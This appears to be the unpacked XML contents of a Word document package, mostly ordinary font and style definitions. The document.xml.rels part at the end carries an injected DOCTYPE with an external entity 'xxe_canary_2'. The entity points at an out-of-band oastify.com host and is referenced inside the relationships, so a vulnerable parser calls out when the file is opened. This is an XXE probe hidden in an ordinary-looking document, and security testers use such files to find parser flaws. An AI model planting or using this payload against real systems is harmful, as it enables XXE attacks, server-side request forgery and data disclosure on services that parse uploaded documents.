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word/document.xml"/></Relationships>
</file>

<file path=word/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
<w:font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mc:Ignorable="w14">
  <w:font w:name="Calibri">
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Times New Roman">
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
</w:fonts>
</file>

<file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
<w:style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mc:Ignorable="w14">
  <w:docDefaults>
    <w:rPrDefault>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
  </w:latentStyles>
  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
    <w:name w:val="Normal Table"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
</w:styles>
</file>

<file path=word/_rels/document.xml.rels><!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM "http://h0i3yrd06vd83oqaw4x9xu56kxqoej28.oastify.com">]><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/>&xxe_canary_2;<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>
</file>